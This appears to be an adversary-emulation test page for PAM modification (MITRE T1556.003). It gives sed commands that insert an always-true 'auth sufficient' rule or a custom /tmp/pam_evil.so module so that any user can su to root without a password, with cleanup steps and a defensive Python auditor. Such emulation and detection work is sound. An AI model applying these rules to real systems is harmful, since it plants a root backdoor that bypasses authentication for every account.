Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is `pam_unix.so`, which retrieves, sets, and verifies account authentication information in `/etc/passwd` and `/etc/shadow`.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as `pam_unix.so`, can be patched to accept arbitrary adversary-supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials: because PAM does not store passwords, the values exchanged with PAM components may be in plain text.(Citation: PAM Creds)(Citation: Apple PAM)

Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 1 |

Run with `sh`. Elevation required (e.g. root or admin).

```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Remove the inserted rule:

```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```

Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 8 |

Run with `sh`. Elevation required (e.g. root or admin).

```sh
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Remove the inserted rule:

```sh
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
```

Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so |
| index | Index where the rule is inserted. | integer | 1 |
| path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c |
| path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so |

Run with `sh`. Elevation required (e.g. root or admin).

```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Remove the inserted rule:

```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```

Prerequisites, run with `sh`. Check that the PAM development headers are installed:

```sh
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
```

Install them if missing:

```sh
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
```

Check that the PAM module exists at the specified path:

```sh
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
```

Build it from source if missing:

```sh
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
```
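
A defender-side check for the two kinds of change the tests above make (an always-true `pam_succeed_if.so` rule marked `auth sufficient`, and a module loaded from outside the system module directories). This is an added example, not part of the original atomics; the function name, the trusted-directory list and the sample config are assumptions constructed for illustration.

```python
import re

# Assumed locations of distro-shipped PAM modules; adjust for the host being audited.
TRUSTED_MODULE_DIRS = (
    "/lib/security/", "/lib64/security/", "/usr/lib/security/", "/usr/lib64/security/",
    "/lib/x86_64-linux-gnu/security/", "/usr/lib/x86_64-linux-gnu/security/",
)
# Fields of a /etc/pam.d rule: type, control (word or [bracketed]), module, arguments.
RULE_RE = re.compile(r"^-?(\w+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")
# pam_succeed_if condition that every account satisfies.
ALWAYS_TRUE_RE = re.compile(r"\b[ug]id\s+>=\s+0\b")

# Constructed sample: an su-l style config carrying both kinds of inserted rule.
SAMPLE_CONFIG = """\
auth sufficient pam_succeed_if.so uid >= 0
#%PAM-1.0
auth       sufficient   pam_rootok.so
auth       sufficient   /tmp/pam_evil.so
auth       requisite    pam_succeed_if.so uid >= 1000 quiet_success
session    optional     /usr/lib64/security/pam_keyinit.so revoke
auth       include      su
"""


def audit_pam_config(text, filename="<pam config>"):
    """Return (filename, line_no, reason, rule) for each suspicious rule."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        rule = raw.split("#", 1)[0].strip()  # comments run to end of line
        match = RULE_RE.match(rule)
        if not match:  # blank lines, comments, @include directives
            continue
        ptype, control, module, args = match.groups()
        # A module referenced by absolute path outside the system module directories.
        if module.startswith("/") and not module.startswith(TRUSTED_MODULE_DIRS):
            findings.append((filename, line_no, "module outside trusted dirs", rule))
        # auth + sufficient + a tautological condition can pass with no credential checked.
        if (ptype == "auth" and control == "sufficient"
                and module.rsplit("/", 1)[-1] == "pam_succeed_if.so"
                and ALWAYS_TRUE_RE.search(args)):
            findings.append((filename, line_no, "always-true pam_succeed_if", rule))
    return findings


if __name__ == "__main__":
    for finding in audit_pam_config(SAMPLE_CONFIG, "sample su-l"):
        print(*finding, sep=" | ")
```

To audit a host, pass the contents of each file under `/etc/pam.d/` to `audit_pam_config` and compare the findings against a known-good baseline.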